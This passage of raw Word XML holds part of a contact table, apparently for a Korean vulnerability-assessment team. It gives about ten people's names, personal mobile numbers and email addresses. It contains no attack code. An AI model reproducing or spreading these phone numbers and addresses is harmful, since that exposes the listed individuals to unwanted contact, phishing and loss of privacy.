              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="333155F7" w14:textId="77777777" w:rsidR="00383492" w:rsidRPr="00383492" w:rsidRDefault="00383492" w:rsidP="00386271">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>E-Mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="33069580" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B9BF7EF" w14:textId="7C812921" w:rsidR="00F973D4" w:rsidRPr="00685044" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>박종우</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="598372D9" w14:textId="4E27C510" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>취약점진단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22D9E5BF" w14:textId="6B26F7A3" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>010-</w:t>
            </w:r>
            <w:r>
              <w:t>2257</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>7957</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C4F8DFB" w14:textId="3388F19F" w:rsidR="00F973D4" w:rsidRPr="00941CDB" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>qtawhwatp@</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>g</w:t>
            </w:r>
            <w:r>
              <w:t>mail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="1120BEDC" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B631BC3" w14:textId="3046AEED" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>가하늘</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="142CC822" w14:textId="22B18BFF" w:rsidR="00F973D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5066DFC" w14:textId="10547D92" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002E3234">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3234">
              <w:t>4184</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3234">
              <w:t>7323</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32B627C7" w14:textId="14620BE7" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002E3234">
              <w:t>qufgpsmsqka0@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="27A139A2" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52AAC63E" w14:textId="6F2CB58B" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>김유림</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C8427F0" w14:textId="213D9075"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4FD2635" w14:textId="51DB8ED3" w:rsidR="00F973D4" w:rsidRPr="002E3234" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>8319</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>2263</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EAFC18E" w14:textId="6F0328F0" w:rsidR="00F973D4" w:rsidRPr="002E3234" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F2330C">
              <w:t>dyb0256@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="7C45D8F0" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11C779D5" w14:textId="1EA0777C" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>김태훈</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C99A072" w14:textId="0D14931C"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CACF482" w14:textId="695C6273" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>9060</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>2556</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="322CD075" w14:textId="1839C858" w:rsidR="00F973D4" w:rsidRPr="00F2330C" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F2330C">
              <w:t>pobpob2556@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="674339DD" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65383B4B" w14:textId="190FB598" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>문서영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="394791D9" w14:textId="0AB647B0"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09B3175D" w14:textId="0DE8D8A6" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>6740</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>3346</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="369402FB" w14:textId="38CC0423" w:rsidR="00F973D4" w:rsidRPr="00F2330C" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>msy042195@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="26C91CA9" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C1B14B4" w14:textId="0C5D34F9" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>박민지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75F61F05" w14:textId="6EC5E30F"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E10F6A7" w14:textId="38A4B5E7" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>8651</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>8921</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BD35DF9" w14:textId="21E337B6" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>ming9ree@swu.ac.kr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="2008E90E" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AAA4FEA" w14:textId="10E17277" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>유승민</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72C8B107" w14:textId="33F0F16F"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83C5567" w14:textId="3D6AFDA0" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>2851</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>6547</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DA50DA2" w14:textId="4C90B5D8" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>ysm001223@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="7DCD8E70" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="530F7590" w14:textId="51DE5FB7" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>이승연</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="131DF4B3" w14:textId="5B0AC13A"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F413344" w14:textId="46A3AE6E" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>10-5630-6215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0358B968" w14:textId="10677C11" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>dltmddus9082@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="2FED5A1E" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="349C8C55" w14:textId="3FA6F29C" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>장형순</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74C06753" w14:textId="02B62FFB"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448E22D" w14:textId="225B537A" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>9209</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>4535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B19981C" w14:textId="249E3801" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>gudtns4535@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w14:paraId="532510C2" w14:textId="77777777" w:rsidTr="00F973D4">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53E638AB" w14:textId="5000CF32" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>정유민</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4218D628" w14:textId="4A19A082"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4DDC94CC" w14:textId="542F71EB" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>010</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>9565</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000D72E2">
              <w:t>5279</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22452EE7" w14:textId="3B322448" w:rsidR="00F973D4" w:rsidRPr="000D72E2" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
              <w:ind w:rightChars="158" w:right="316"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000D72E2">
              <w:t>jeongym349@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
